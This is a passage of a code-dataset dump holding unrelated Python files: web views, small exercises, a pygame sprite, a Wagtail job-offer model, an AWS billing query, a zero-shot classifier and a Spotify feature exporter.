req.params()['delivery_minimum']\r\n delivery_daysandtimes = req.params()['delivery_daysandtimes']\r\n notes = req.params()['notes']\r\n delivery_zip = req.params()['delivery_zip']\r\n purchase_order_email_1 = req.params()['purchase_order_email_1']\r\n purchase_order_email_2 = req.params()['purchase_order_email_2']\r\n purchase_order_email_3 = req.params()['purchase_order_email_3']\r\n purchase_order_email_4 = req.params()['purchase_order_email_4']\r\n description = req.params()['description']\r\n contact_phone_number1 = req.params()['contact_phone_number1']\r\n contact_phone_number2 = req.params()['contact_phone_number2']\r\n contact_email = req.params()['contact_email']\r\n company_name = req.params()['company_name']\r\n delivery_notes = req.params()['delivery_notes']\r\n\r\n #update vendor\r\n vendor.name = name\r\n vendor.description = description\r\n vendor.address_1 = address_1\r\n vendor.address_2 = address_2\r\n vendor.address_3 = address_3\r\n vendor.address_4 = address_4\r\n vendor.address_5 = address_5\r\n vendor.phone_num_1 = phone_num_1\r\n vendor.phone_num_2 = phone_num_2\r\n vendor.cell_phone_num = cell_phone_num\r\n vendor.fax_num = fax_num\r\n vendor.web = web\r\n vendor.category = category\r\n vendor.account_num = account_num\r\n vendor.contact = contact\r\n vendor.email = email\r\n vendor.payment_terms = payment_terms\r\n vendor.delivery_charge = delivery_charge\r\n vendor.delivery_minimum = delivery_minimum\r\n 
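The vendor-update record above copies each request parameter onto the model one line at a time. The same update can be written data-driven, which keeps the field list in one place; a hedged sketch (the FIELDS tuple is illustrative and abbreviated, not the full field list from the record):

FIELDS = ('name', 'description', 'address_1', 'address_2', 'phone_num_1', 'email')  # abbreviated

def apply_params(vendor, params):
    # Equivalent to the long run of `x = req.params()['x']` / `vendor.x = x` pairs above.
    for field in FIELDS:
        setattr(vendor, field, params[field])
    vendor.save()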
vendor.delivery_daysandtimes = delivery_daysandtimes\r\n vendor.notes = notes\r\n vendor.delivery_zip = delivery_zip\r\n vendor.purchase_order_email_1 = purchase_order_email_1\r\n vendor.purchase_order_email_2 = purchase_order_email_2\r\n vendor.purchase_order_email_3 = purchase_order_email_3\r\n vendor.purchase_order_email_4 = purchase_order_email_4\r\n vendor.contact_phone_number1 = contact_phone_number1\r\n vendor.contact_phone_number2 = contact_phone_number2\r\n vendor.contact_email = contact_email\r\n vendor.company_name = company_name\r\n vendor.delivery_notes = delivery_notes\r\n\r\n #save vendor\r\n vendor.save()\r\n\r\n return { \"success\": True, \"message\": \"vendor %s successfully changed\" % str(vendor.id) }\r\n","sub_path":"backend/vendor/update/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"14251431","text":"# This problem was asked by Facebook.\n\n# Given a function f, and N return a debounced f of N milliseconds.\n\n# That is, as long as the debounced f continues to be invoked, f itself will not be called for N milliseconds.\n\nimport signal\nimport time\n\ndef f():\n\tprint(\"calling f\")\n\n\ndef handler(*args):\n\tprint(\"this is the handler\")\n\tf()\n\n\ndef debounced_f(f, N):\n\tprint(\"debouced_f\")\n\tsignal.signal(signal.SIGALRM, handler)\n\tsignal.alarm(N)\n\tprint(\"alarm set\")\n\nif __name__ == '__main__':\n\tdebounced_f(f, 5)\n\tfor i in range(100):\n\t\tprint(i)\n\t\ttime.sleep(1)\n\t\tif i == 2:\n\t\t\tdebounced_f(f, 5)","sub_path":"andylou2/10_19_2018.py","file_name":"10_19_2018.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"250002077","text":"#导入模块\r\nimport pygame\r\n#导入精灵类\r\nfrom pygame.sprite import Sprite\r\n\r\nclass Bullet(Sprite):\r\n \"\"\"飞船发射的子弹类\"\"\"\r\n def __init__(self, sb_settings, screen, airship):\r\n \"\"\"在飞船所在位置创建子弹对象\"\"\"\r\n #继承 Sprite 精灵类\r\n super().__init__()\r\n self.screen = screen\r\n\r\n #先在(0,0)处创建子弹矩形,再设置其正确位置\r\n self.rect = pygame.Rect(0, 0, sb_settings.bullet_width,\r\n sb_settings.bullet_height)\r\n self.rect.centerx = airship.rect.centerx\r\n self.rect.top = airship.rect.top\r\n\r\n #子弹位置用 y 坐标表示,强制为浮点数类型\r\n self.y = float(self.rect.y)\r\n\r\n #获取参数设置里的颜色及速度设置值\r\n self.color = sb_settings.bullet_color\r\n self.speed = sb_settings.bullet_speed\r\n\r\n def update(self):\r\n \"\"\"向上移动子弹\"\"\"\r\n #更新子弹位置值\r\n self.y -= self.speed\r\n \r\n #更新子弹rect的位置\r\n self.rect.y = self.y\r\n \r\n def draw_bullet(self):\r\n \"\"\"在屏幕上绘制子弹\"\"\"\r\n pygame.draw.rect(self.screen, self.color, self.rect)\r\n ","sub_path":"MyProjects/Python/Shoot_Bees/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"156752762","text":"from datetime import datetime\n\n\ndef date_time(time: str) -> str:\n time = datetime.strptime(time, '%d.%m.%Y %H:%M')\n plural_time = ('s' if i != 1 else '' for i in (time.hour, time.minute))\n return time.strftime('%-d %B %Y year %-H hour{} %-M minute{}').format(*plural_time)\n\nif __name__ == '__main__':\n print(\"Example:\")\n print(date_time('01.01.2000 00:00'))\n\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert date_time(\"01.01.2000 00:00\") == \"1 January 2000 year 0 hours 0 minutes\", \"Millenium\"\n assert 
date_time(\"09.05.1945 06:30\") == \"9 May 1945 year 6 hours 30 minutes\", \"Victory\"\n assert date_time(\"20.11.1990 03:55\") == \"20 November 1990 year 3 hours 55 minutes\", \"Somebody was born\"\n print(\"Coding complete? Click 'Check' to earn cool rewards!\")","sub_path":"electronic_station/date_and_time_converter.py","file_name":"date_and_time_converter.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"214223882","text":"'''\r\nCreated on May 26, 2010\r\n\r\n@author: Dr. Rainer Hessmer\r\n'''\r\nimport wx\r\nimport wx.lib.sized_controls as sc\r\n\r\nclass SpeedControllerSettingsDialog(sc.SizedDialog):\r\n def __init__(self, parent, mainModel):\r\n sc.SizedDialog.__init__(self, parent, -1, \"Speed Controller\", style=wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER)\r\n \r\n self._MainModel = mainModel\r\n speedControlParams = mainModel.SpeedControlParams\r\n \r\n _Pane = self.GetContentsPane()\r\n _Pane.SetSizerType(\"form\")\r\n \r\n # row 1\r\n wx.StaticText(_Pane, -1, 'P:')\r\n self._PTextControl = wx.TextCtrl(_Pane, -1, str(speedControlParams['P']))\r\n self._PTextControl.SetSizerProps(expand=True)\r\n \r\n # row 2\r\n wx.StaticText(_Pane, -1, 'I:')\r\n self._ITextControl = wx.TextCtrl(_Pane, -1, str(speedControlParams['I']))\r\n self._ITextControl.SetSizerProps(expand=True)\r\n \r\n # row 3\r\n wx.StaticText(_Pane, -1, 'D:')\r\n self._DTextControl = wx.TextCtrl(_Pane, -1, str(speedControlParams['D']))\r\n self._DTextControl.SetSizerProps(expand=True)\r\n\r\n wx.StaticText(_Pane, -1, '')\r\n\r\n self._ApplyPIDButton = wx.Button(_Pane, -1, 'Set PID')\r\n self._ApplyPIDButton.Bind(wx.EVT_BUTTON, self._OnApplyPID)\r\n\r\n self._SpeedTextControl = wx.TextCtrl(_Pane, -1, '0.0')\r\n self._SpeedTextControl.SetSizerProps(expand=True)\r\n\r\n self._ApplySpeedButton = wx.Button(_Pane, -1, 'Set Speed')\r\n self._ApplySpeedButton.Bind(wx.EVT_BUTTON, self._OnApplySpeed)\r\n \r\n # add dialog buttons\r\n #self.SetButtonSizer(self.CreateStdDialogButtonSizer(wx.OK | wx.CANCEL))\r\n \r\n # final row\r\n # since we want to use a custom button layout, we won't use the \r\n # CreateStdDialogBtnSizer here, we'll just create our own panel with\r\n # a horizontal layout and add the buttons to that.\r\n #buttonPanel = sc.SizedPanel(_Pane, -1)\r\n #buttonPanel.SetSizerType(\"horizontal\")\r\n #buttonPanel.SetSizerProps(expand=True)\r\n #self._CancelButton.Bind(wx.EVT_BUTTON, self._OnCancel)\r\n \r\n \r\n # a little trick to make sure that you can't resize the dialog to\r\n # less screen space than the controls need\r\n self.Fit()\r\n self.SetMinSize(self.GetSize())\r\n\r\n def _OnCancel(self, e):\r\n self.Close(True) # Close the frame.\r\n\r\n def _OnApplyPID(self, e):\r\n pidParams = (self._PTextControl.Value, self._ITextControl.Value, self._DTextControl.Value)\r\n self._MainModel.SetSpeedControlParams(pidParams)\r\n\r\n def _OnApplySpeed(self, e):\r\n self._MainModel.SetSpeed(self._SpeedTextControl.Value)\r\n","sub_path":"PythonClient/RobotController/src/UI/SpeedControllerSettingsDialog.py","file_name":"SpeedControllerSettingsDialog.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"249252978","text":"'''\nUna EPS desea conocer el numero personas atendidas en su programa de \nvacunación contra el COVID 19, la información debe ir discriminada \nde la siguiente manera: Número total de personas atendidas, número 
total \nde mujeres atendidas, número total de hombres atendidos, personas atendidas \nentre los rangos de edades de 40 a 49, 50 a 59, 60 a 69, 70 a 79 y mayores de 80.\n\nLa ciudad cuenta con 8 comunas, se desea conocer también el número de personas \natendidas por comuna y las personas que en los últimos 3 meses tuvieron COVID 19.\n\nSe debe procesar n cantidad de datos de personas con la siguiente información:\n1. Edad\n2. Sexo\n3. Comuna\n4. Covid_antes_SN\n\nEscriba una función que reciba como parámetros una lista de diccionarios \nque contengan la siguiente información:\n1. Edad: int\n2. Sexo: f/m\n3. Comuna: Puede ser de la 01 a la 08\n4. Covid_antes: puede ser afirmativo o negativo (s/n)\n\nEjemplo Datos\ndatos: list = [\n {\n \"edad\": 40\n \"sexo\": f\n \"comuna\": 04\n \"covid_antes\": n\n },\n]\nLa respuesta debe retornar un diccionario con la siguiente información:\n# total de personas atendidas\n# total de mujeres atendidas\n# total de hombres atendidos\n# total de personas atendidas con edades entre los 40 y 49 años.\n# total de personas atendidas con edades entre los 50 y 59 años.\n# total de personas atendidas con edades entre los 60 y 69 años.\n# total de personas atendidas con edades entre los 70 y 79 años.\n# total de personas atendidas mayores de 80 años.\n'''\ndef EPS_COVID(datos: list) -> dict:\n Total_atendidos = 0\n Mujeres : str = \"f\"\n Hombres : str = \"m\"\n Total_mujeres = 0\n Total_hombres = 0\n Total_cuarenta_cuarentaynueve = 0\n Total_cincuenta_cincuentaynueve = 0\n Total_sesenta_sesentaynueve = 0\n Total_sententa_setentaynueve = 0\n Total_mayores_ochenta = 0\n for item in datos:\n Total_atendidos += 1\n if item['sexo'] == Mujeres:\n Total_mujeres += 1\n elif item['sexo'] == Hombres:\n Total_hombres += 1\n if item['edad'] >= 40 and item['edad'] < 50:\n Total_cuarenta_cuarentaynueve += 1\n elif item['edad'] >= 50 and item['edad'] < 60:\n Total_cincuenta_cincuentaynueve +=1\n elif item['edad'] >= 60 and item['edad'] < 70:\n Total_sesenta_sesentaynueve += 1\n elif item['edad'] >= 70 and item['edad'] < 80:\n Total_sententa_setentaynueve += 1\n elif item['edad'] >= 80:\n Total_mayores_ochenta += 1\n resultado: dict = {\n \"Total_personas_atendidas\" : Total_atendidos,\n \"Total_mujeres_atendidas\" : Total_mujeres,\n \"Total_hombres_atendidos\" : Total_hombres,\n \"Total-de_personas_atendidas_con_edades_entre_los_40_y_49_años\": Total_cuarenta_cuarentaynueve,\n \"Total-de_personas_atendidas_con_edades_entre_los_50_y_59_años\": Total_cincuenta_cincuentaynueve,\n \"Total-de_personas_atendidas_con_edades_entre_los_60_y_69_años\": Total_sententa_setentaynueve,\n \"Total-de_personas_atendidas_con_edades_entre_los_70_y_79_años\": Total_sesenta_sesentaynueve,\n \"Total-de_personas_atendidas_mayores_80\": Total_mayores_ochenta\n }\n return resultado\nimport pprint\ndatos: list = [\n {\n \"sexo\" : \"f\",\n \"edad\" : 40,\n \"comuna\" : \"04\",\n \"covid_antes\" : \"n\"\n },\n {\n \"sexo\" : \"f\",\n \"edad\" : 49,\n \"comuna\" : \"05\",\n \"covid_antes\" : \"n\"\n },\n {\n \"sexo\" : \"m\",\n \"edad\" : 51,\n \"comuna\" : \"06\",\n \"covid_antes\" : \"s\"\n },\n {\n \"sexo\" : \"f\",\n \"edad\" : 62,\n \"comuna\" : \"07\",\n \"covid_antes\" : \"s\"\n },\n {\n \"sexo\" : \"m\",\n \"edad\" : 80,\n \"comuna\" : \"04\",\n \"covid_antes\" : \"n\"\n },\n {\n \"sexo\" : \"m\",\n \"edad\" : 62,\n \"comuna\" : \"05\",\n \"covid_antes\" : \"s\"\n },\n {\n \"sexo\" : \"m\",\n \"edad\" : 72,\n \"comuna\" : \"06\",\n \"covid_antes\" : \"n\"\n 
}\n]\npprint.pprint(EPS_COVID(datos))","sub_path":"EPS.py","file_name":"EPS.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"569778402","text":"import datetime\n#from d3 import find_cost\nfrom datetime import date, timedelta\n\n\ndef find_cost1(desc,stdt,endt):\n import boto3\n client = boto3.client('ce')\n stdt = str(stdt)\n endt = str(endt)\n\n response = client.get_cost_and_usage(\n TimePeriod={\n 'Start': stdt,\n 'End': endt\n },\n Granularity='DAILY',\n Metrics=[\n 'BlendedCost',\n ],\n )\n bill = 0\n for nik in response['ResultsByTime']:\n amt = float(nik['Total']['BlendedCost']['Amount'])\n bill = bill + amt\n ##print(desc)\n print(bill)\n\n\nlast_days = 6\ndesc1 = \"BILL INSCREASE IN LAST 5 DAYS \"+ \"\\n\"\nfor i in range(1,last_days):\n stdt = date.today() - timedelta(i)\n endt = date.today() - timedelta(i-1)\n #print(str(stdt) +\" \"+ str(endt))\n desc1=\"\"\n desc1= str(stdt) + \":\"\n find_cost1(desc1,stdt,endt)\n\n\n\n# if (todayDate - todayDate.replace(day=1)).days > 25:\n# stmonth= todayDate + datetime.timedelta(30)\n# stmonth.replace(day=1)\n# print(stmonth)\n# else:\n# stmonth = (todayDate.replace(day=1))","sub_path":"NIK2.py","file_name":"NIK2.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"649809513","text":"#perintah untuk menginput nilai\nnum = eval(input('Please enter an integer in the range 0...9999: '))\n\nif num < 0 : #jika nilai yang diinput kurang dari nol, maka\n num = 0 #maka akan di anggap nol\nif num > 9999: #jika nilai yang diinput lebih besar dari 9999, maka\n num = 9999 #akan dianggap 9999\n\nprint(\"[\", end=\"\") #perintah untuk mencetak kurung siku, keyword argumen\n # end=\"\" menjadikan bahwa cetakan ini akan berlanjut\n # dengan perintah-perintah 'print' yang lain\n\n\ndigit = num//1000 #menentukan digit ribuan\nprint(digit, end=\"\") #mencetak hasil digit tersebut dan meletakkannya setelah\n #tanda kurung siku di perintah sebelumnya, perintah cetak\n #akan dilanjutkan oleh perintah 'print' berikutnya.\nnum %= 1000 #menghitung nilai sisa pembagian num dengan 1000\n\n\ndigit = num//1000 #menentukan digit ratusan\nprint(digit, end=\"\") #mencetak hasil digit tersebut dan meletakkannya setelah\n #digit ribuan di perintah sebelumnya, perintah cetak\n #akan dilanjutkan oleh perintah 'print' berikutnya.\nnum %= 1000 #menghitung nilai sisa pembagian num dengan 100\n\n\ndigit = num//1000 #menentukan digit puluhan\nprint(digit, end=\"\") #mencetak hasil digit tersebut dan meletakkannya setelah\n #digit ratusan di perintah sebelumnya, perintah cetak\n #akan dilanjutkan oleh perintah 'print' berikutnya.\nnum %= 1000 #menghitung nilai sisa pembagian num dengan 10\n\nprint(num, end=\"\") #mencetak hasil sisa pembagian num dengan 10 dan\n #menempatkannya pada digit satuan, perintah print berlanjut\n\nprint(\"]\") #mencetak kurung siku, sehingga secara keseluruhan perintah\n #print akan mencetak 6 karakter: [****], dimana **** ini adalah\n #digit ribuan, ratusan, puluhan, dan satuan, berturut-turut.","sub_path":"chapter4_conditional-execution/leadingzeroes.py","file_name":"leadingzeroes.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"239487126","text":"#!/usr/bin/env python3\nimport heapq\n\ndef main():\n def dijkstra(i):\n # print('-'*100)\n hq = [(i, 0)]\n\n 
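One correction worth noting for the zero-padding record above (leadingzeroes.py): the hundreds and tens blocks reuse num//1000 and num %= 1000 even though their own comments describe dividing by 100 and by 10, so only the thousands digit is extracted correctly. A corrected sketch of the intended extraction:

num = 47                        # example input already clamped to 0..9999
print("[", end="")
n = num
for divisor in (1000, 100, 10):
    print(n // divisor, end="")  # thousands, then hundreds, then tens digit
    n %= divisor
print(n, end="")                # ones digit
print("]")                      # prints: [0047]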
time_list = [float('inf')] * N\n # 引っ越し候補地のバス停のコストは0\n time_list[i] = 0\n\n heapq.heapify(hq)\n # print(f'time_list: {time_list}')\n while hq:\n bus_stop, total_time = heapq.heappop(hq)\n\n # print(f'bus_stop, total_time: {bus_stop}, {total_time}')\n\n for a2b, a2b_time in rosen[bus_stop]:\n # print(f'a2b, a2b_time: {a2b}, {a2b_time}')\n\n if total_time + a2b_time < time_list[a2b]:\n time_list[a2b] = total_time + a2b_time\n heapq.heappush(hq, (a2b, time_list[a2b]))\n # print(f'time_list: {time_list}')\n\n return time_list\n\n N, M = map(int, input().split())\n rosen = [[] for _ in range(N)]\n\n for _ in range(M):\n a, b, t = map(int, input().split())\n a -= 1\n b -= 1\n rosen[a].append((b, t))\n rosen[b].append((a, t))\n # print(rosen)\n\n ans = float('inf')\n for i in range(N):\n d = dijkstra(i)\n ans = min(ans, max(d))\n print(ans)\n\nif __name__ == '__main__':\n main()\n","sub_path":"atcoder/python/beginner/abc012/D/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"305622843","text":"\"\"\"\n# -*- coding: UTF-8 -*-\n# **********************************************************************************#\n# File: Exceptions utils file.\n# Author: Myron\n# **********************************************************************************#\n\"\"\"\nerror_wrapper = (lambda code, message: {'code': code, 'data': message, 'msg': message})\n\n\ndef deal_with_exception(func):\n \"\"\"\n Deal with exception.\n \"\"\"\n def _decorator(obj, *args, **kwargs):\n try:\n response = func(obj, *args, **kwargs)\n except tuple(Exceptions.error_types()) as error_code:\n response = error_code.args[0]\n except:\n response = error_wrapper(500, 'Exception unknown.'.format(func.func_name))\n return response\n return _decorator\n\n\nclass DataException(Exception):\n \"\"\"\n Exception in module data.\n \"\"\"\n pass\n\n\nclass BaseExceptions(object):\n \"\"\"\n Base exception enumerate.\n \"\"\"\n @classmethod\n def enumerates(cls):\n \"\"\"\n all exceptions enumerate.\n \"\"\"\n return [value for attr, value in cls.__dict__.items()]\n\n @classmethod\n def error_types(cls):\n \"\"\"\n all error types enumerate.\n \"\"\"\n return tuple([\n DataException\n ])\n\n\nclass Exceptions(BaseExceptions):\n \"\"\"\n Enumerate exceptions.\n \"\"\"\n INVALID_FIELDS = DataException(error_wrapper(500, 'There exits invalid fields.'))\n\n\n__all__ = [\n 'Exceptions',\n]\n","sub_path":"g_air/utils/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"616551699","text":"import os\nimport json\nimport argparse\nfrom tqdm import tqdm\nfrom transformers import pipeline, AutoModel, AutoTokenizer\n\nmodel_name = 'facebook/bart-large-mnli'\nMODEL_DIR = 'embeddings'\nMAX_LENGTH = 512\nDEVICE = -1 # CPU\n\ndef process_entry(entry, dictionary):\n tokens = entry['tokens']\n acronym = tokens[entry['acronym']]\n expansions = dictionary.get(acronym)\n if expansions is None or len(expansions) == 0:\n return None, None\n tokens = ' '.join(map(lambda _: _.lower(), tokens))\n return tokens, expansions\n\ndef check_prediction(classifier, entry, dictionary):\n tokens, expansions = process_entry(entry, dictionary)\n actual = entry.get('expansion')\n pred = classifier(tokens, expansions)\n predicted = pred.get('labels')\n if not predicted or not isinstance(predicted, list):\n return False\n return 
actual == predicted[0]\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input-file\", help=\"JSON input file\")\n parser.add_argument(\"--dictionary-file\", help=\"JSON dictionary file with acronyms and expansions\",\n default=os.path.join('data', 'diction.json'))\n parser.add_argument(\"--model-name\", help=\"Model name\", default=model_name)\n args = parser.parse_args()\n\n with open(args.input_file, 'r', encoding='utf-8') as f:\n data = json.load(f)\n data = data[:1000]\n with open(args.dictionary_file, 'r', encoding='utf-8') as f:\n dictionary = json.load(f)\n model_name = args.model_name\n model = AutoModel.from_pretrained(model_name, cache_dir=MODEL_DIR)\n tokenizer = AutoTokenizer.from_pretrained(model_name, cache_dir=MODEL_DIR)\n classifier = pipeline('zero-shot-classification', model=model, tokenizer=tokenizer, device=DEVICE)\n results = list(map(lambda x: check_prediction(classifier, x, dictionary), tqdm(data)))\n print('Accuracy:', sum(results)/len(results))\n","sub_path":"models/zeroshot.py","file_name":"zeroshot.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"191591836","text":"from django.db import models\nfrom django.utils import timezone\nfrom django.core.validators import MinValueValidator\nfrom django import forms\n\nfrom wagtail.admin.edit_handlers import (\n FieldPanel,\n StreamFieldPanel,\n MultiFieldPanel,\n HelpPanel,\n)\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom wagtail.core.fields import StreamField\nfrom wagtail.search import index\n\nfrom core.blocks import StandardStreamBlock\nfrom core.models import BasePage, StandardPage\n\nfrom .fields import ChoiceArrayField\n\n\nclass JobOfferIndexPage(BasePage):\n subpage_types = [\"JobOfferPage\"]\n max_count_per_parent = 1\n\n heading = models.CharField(\"Überschrift\", max_length=255, blank=True)\n highlight_in_heading = models.CharField(\n \"Hervorhebungen in der Überschrift\",\n help_text=\"Wiederhole Text aus der Überschrift der farblich hervorgehoben werden soll\",\n blank=True,\n max_length=255,\n )\n subtitle = models.CharField(\"Untertitel\", max_length=255, blank=True)\n\n before_jobs = StreamField(\n StandardStreamBlock,\n blank=True,\n verbose_name=\"Intro-Text (wenn Jobs vorhanden)\",\n help_text=\"Wird als Text vor der Liste der Stellenanzeigen angezeigt. Aber nur wenn es auch Stellenanzeigen gibt.\",\n )\n\n after_jobs = StreamField(\n StandardStreamBlock,\n blank=True,\n verbose_name=\"Outro-Text (wenn Jobs vorhanden)\",\n help_text=\"Wird als Text nach der Liste der Stellenanzeigen angezeigt. 
Aber nur wenn es auch Stellenanzeigen gibt.\",\n )\n\n empty = StreamField(\n StandardStreamBlock(),\n blank=True,\n null=True,\n verbose_name=\"Wenn keine Jobs\",\n help_text=\"Wird angezeigt, wenn es keine Stellenanzeigen gibt.\",\n )\n\n def get_context(self, request):\n context = super().get_context(request)\n context[\"jobs\"] = JobOfferPage.objects.all().live()\n return context\n\n search_fields = BasePage.search_fields + [\n index.SearchField(\"heading\"),\n index.SearchField(\"subtitle\"),\n index.SearchField(\"before_jobs\"),\n index.SearchField(\"after_jobs\"),\n ]\n\n content_panels = [\n MultiFieldPanel(\n [\n FieldPanel(\"title\"),\n FieldPanel(\"heading\"),\n FieldPanel(\"highlight_in_heading\"),\n FieldPanel(\"subtitle\"),\n ],\n \"Kopf\",\n ),\n StreamFieldPanel(\"before_jobs\"),\n HelpPanel(\n template=\"jobs/admin_add_job_button.html\",\n heading=\"Stellenauschreibung erstellen\",\n ),\n StreamFieldPanel(\"after_jobs\"),\n StreamFieldPanel(\"empty\"),\n ]\n\n class Meta:\n verbose_name = \"Auflistung von Stellenausschreibungen\"\n verbose_name_plural = \"Auflistungen von Stellenausschreibungen\"\n\n\nclass JobOfferPage(StandardPage):\n parent_page_types = [\"JobOfferIndexPage\"]\n subpage_types = [\"core.StandardPage\"]\n\n valid_through = models.DateTimeField(\n \"Bewerbungsfrist\",\n blank=True,\n null=True,\n validators=[\n MinValueValidator(timezone.now, message=\"Sollte in der Zukunft liegen\")\n ],\n )\n job_title = models.CharField(\"Job-Titel\", max_length=255)\n job_location = models.CharField(\n \"Job-Ort\", max_length=255, blank=True, default=\"Hannover\"\n )\n hiring_organization_name = models.CharField(\n \"Arbeitgeber\", max_length=255, default=\"JANUN e.V.\"\n )\n hiring_organization_url = models.URLField(\n \"Website des Arbeitgebers\", blank=True, default=\"https://www.janun.de/\"\n )\n EMPLOYMENT_TYPE_CHOICES = [\n (\"FULL_TIME\", \"Vollzeit\"),\n (\"PART_TIME\", \"Teilzeit\"),\n (\"CONTRACTOR\", \"Auftragnehmer\"),\n (\"TEMPORARY\", \"befristet\"),\n (\"INTERN\", \"Praktikum\"),\n (\"VOLUNTEER\", \"Freiwilligendienst\"),\n (\"PER_DIEM\", \"tageweise\"),\n (\"OTHER\", \"anderes\"),\n ]\n employment_type = ChoiceArrayField(\n models.CharField(max_length=20, choices=EMPLOYMENT_TYPE_CHOICES),\n verbose_name=\"Art der Anstellung\",\n blank=True,\n null=True,\n )\n base_salary_amount = models.DecimalField(\n \"Grundgehalt\", blank=True, null=True, decimal_places=2, max_digits=10\n )\n BASE_SALARY_UNIT_CHOICES = [\n (\"HOUR\", \"pro Stunde\"),\n (\"DAY\", \"pro Tag\"),\n (\"WEEK\", \"pro Woche\"),\n (\"MONTH\", \"pro Monat\"),\n (\"YEAR\", \"pro Jahr\"),\n ]\n base_salary_unit = models.CharField(\n \"Zeitraum für Grundgehalt\",\n max_length=10,\n default=\"MONTH\",\n choices=BASE_SALARY_UNIT_CHOICES,\n )\n auto_unpublish = models.BooleanField(\n \"Automatisch depublizieren\",\n help_text=\"Depubliziert die Seite automatisch nach der Bewerbungsfrist\",\n default=True,\n )\n\n def get_employment_type_display(self) -> [str]:\n result = []\n for employment_type in self.employment_type:\n for choice in self.EMPLOYMENT_TYPE_CHOICES:\n if employment_type == choice[0]:\n result.append(choice[1])\n return result\n\n @property\n def structured_data(self):\n return {\n \"@type\": \"JobPosting\",\n \"title\": self.job_title,\n \"description\": str(self.body),\n \"datePosted\": self.first_published_at,\n \"validThrough\": self.valid_through,\n \"hiringOrganization\": {\n \"@type\": \"Organization\",\n \"name\": self.hiring_organization_name,\n \"sameAs\": 
self.hiring_organization_url,\n },\n \"jobLocation\": {\"@type\": \"Place\", \"address\": self.job_location},\n \"employmentType\": self.employment_type,\n \"baseSalary\": {\n \"@type\": \"MonetaryAmount\",\n \"currency\": \"EUR\",\n \"value\": {\n \"@type\": \"QuantitativeValue\",\n \"value\": self.base_salary_amount,\n \"unitText\": self.base_salary_unit,\n },\n },\n }\n\n def save(self, *args, **kwargs):\n if self.valid_through and self.auto_unpublish:\n self.expire_at = self.valid_through\n super().save(*args, **kwargs)\n\n content_panels = [\n FieldPanel(\"title\"),\n FieldPanel(\"subtitle\"),\n ImageChooserPanel(\"feed_image\"),\n MultiFieldPanel(\n [\n HelpPanel(\n \"<p>Sorgt für eine bessere Platzierung als Jobanzeige bei Google und co.</p>\"\n ),\n FieldPanel(\"job_title\"),\n FieldPanel(\"job_location\"),\n FieldPanel(\"hiring_organization_name\"),\n FieldPanel(\"hiring_organization_url\"),\n FieldPanel(\"valid_through\"),\n FieldPanel(\"auto_unpublish\"),\n FieldPanel(\"employment_type\", widget=forms.CheckboxSelectMultiple),\n FieldPanel(\"base_salary_amount\"),\n FieldPanel(\"base_salary_unit\"),\n ],\n heading=\"Infos\",\n ),\n StreamFieldPanel(\"body\"),\n ]\n\n class Meta:\n verbose_name = \"Stellenausschreibung\"\n verbose_name_plural = \"Stellenausschreibungen\"\n","sub_path":"jobs/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"80812680","text":"import pandas as pd \nimport spotipy \nsp = spotipy.Spotify() \nfrom spotipy.oauth2 import SpotifyClientCredentials \n\ncid =\"YOUR_CLIENT_ID\" \nsecret = \"YOUR_CLIENT_SECRET\" \nclient_credentials_manager = SpotifyClientCredentials(client_id=cid, client_secret=secret) \nsp = spotipy.Spotify(client_credentials_manager=client_credentials_manager) \nsp.trace=False \n\nplaylist = sp.user_playlist(\"USERNAME\", \"PLAYLIST_ID\")\nplaylist_tracks = playlist[\"tracks\"]\nplaylist_songs = playlist_tracks[\"items\"]\nwhile playlist_tracks[\"next\"]:\n\tplaylist_tracks = sp.next(playlist_tracks)\n\tfor item in playlist_tracks[\"items\"]:\n\t\tplaylist_songs.append(item)\n\nplaylist_ids = []\nfor i in range(len(playlist_songs)):\n\tplaylist_ids.append(playlist_songs[i]['track']['id'])\n\nfeatures = []\nj = 0\nfor i in range(0,len(playlist_ids),50):\n\taudio_features = sp.audio_features(playlist_ids[i:i+50])\n\tfor track in audio_features:\n\t\ttrack['song_title'] = playlist_songs[j]['track']['name']\n\t\ttrack['artist'] = playlist_songs[j]['track']['artists'][0]['name']\n\t\tj = j+1\n\t\tfeatures.append(track)\n\ndf = pd.DataFrame(features) \ndf.to_csv('features.csv')\n","sub_path":"playlist_features.py","file_name":"playlist_features.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"392869913","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"Tree things.\"\"\"\n\nfrom collections import deque\nfrom sys import 